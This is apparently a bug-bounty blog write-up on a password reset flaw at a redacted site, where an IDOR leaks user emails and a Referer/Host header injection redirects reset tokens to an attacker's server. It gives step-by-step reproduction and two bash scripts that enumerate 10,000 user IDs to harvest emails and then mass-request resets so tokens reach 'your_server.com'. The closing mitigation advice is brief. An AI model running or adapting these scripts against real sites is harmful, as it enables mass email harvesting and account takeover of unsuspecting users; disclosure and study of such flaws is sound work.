Chaining IDOR and Host Header can takeover 18 Million of users account

This blog article discusses a security flaw that was found in the password reset feature of redacted.com. The flaw unintentionally exposes user email addresses through Insecure Direct Object References (IDOR). Additionally there is another vulnerability called Host Header Injection, which increases the risk of mass account takeovers.

Bug Scenario

(FIRST) IDOR in Password Reset Functionality

The first bug discovered involves an Insecure Direct Object Reference (IDOR) within the password reset functionality of redacted.com. The steps to reproduce this vulnerability are as follows:

1. Navigate to “https://redacted.com/reset."
2. Enter your email address and intercept the request.
3. In the request I see two parameters, “email” and “id” parameters.
4. No change in the email parameter (because email parameter doesn’t matter to fetch victim’s email) but modify the “id” parameter value.
5. The response will reveal the victim’s email address associated with the manipulated user ID.

(SECOND) Host Header Injection in Password Rest Functionality

Second vulnerability Host Header Injection was identified in the password reset functionality. This injection, when combined with the IDOR bug, opens the door to potential mass account takeovers. Follow these steps:

1. Copy the victim’s email obtained through the IDOR exploit.
2. Paste the victim’s email into the email address field and intercept the request.
3. Change the Referer header from “https://redacted.com" to “https://your_Server.com."
4. And the reset password token will sent to your server for the Victim’s account.

(THIRD) The Result: Mass Account Takeover

Through these actions hackers are able to obtain the password reset link, for every individuals account. This ultimately results in a mass takeover of accounts, on the redacted.com platform.

Automate this process by two steps

First Step

Creating wordlist of victim’s email by using this simple bash script for getting active user emails and make a list for next step:

#!/bin/bash

url="https://redacted.com/reset"
output_file="output.txt"

email_regex="\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b"

for ((id=1; id<=10000; id++)); do
    response=$(curl -s -X POST $url --data "email=&id=$id")
    email=$(echo "$response" | grep -oP "$email_regex")
    
    if [ -n "$email" ]; then
        echo "ID: $id -> Email: $email >> "$output_file"
    fi
done

Second Step

Using the email wordlist request for password against each email address using this bash script will capture the reset password tokens for each email we collected from first step:

#!/bin/bash

input_file="output.txt"

your_server="https://your_server.com"

while IFS= read -r line; do
    id=$(echo "$line" | grep -oP 'ID: \K[0-9]+')
    email=$(echo "$line" | grep -oP 'Email: \K[^,]+')

    response=$(curl -s -X POST https://redacted.com/reset --data "email=$email&id=$id" -H "Referer: $your_server")

    echo "ID: $id -> Reset Token Sent for $email"
done < "$input_file"

The Result: Mass Account Takeover

Through these actions hackers are able to obtain the password reset link, for every individuals account.

The server will only send reset password link when Email and User ID match otherwise it disclosed the email associated with the User ID.

This ultimately results in a mass takeover of accounts, on the redacted.com platform.

Impact

1. Exploiting the IDOR vulnerability reveals user emails, while the Host Header Injection allows attackers to intercept reset password links, leading to mass disclosure.
2. The chaining of IDOR and Host Header Injection leads to mass account takeovers, granting unauthorized access to sensitive user data and activities.
3. The fallout from a mass account takeover and data breach can incur substantial financial losses, including costs for incident response, legal actions, and operational disruptions for redacted.com.
4. Successful exploitation of these vulnerabilities can severely damage redacted.com’s reputation, eroding user trust in the platform’s security measures.

Mitigation

To protect against these vulnerabilities redacted.com should consider implementing the following measures:

1. Strengthen input validation mechanisms, for verifying inputs to avoid any tampering with parameters.
2. Enhance session management practices to detect and prevent unauthorized access.
3. Implement strict validation of Host headers to mitigate Host Header Injection risks

Thank you for taking the time to read this article!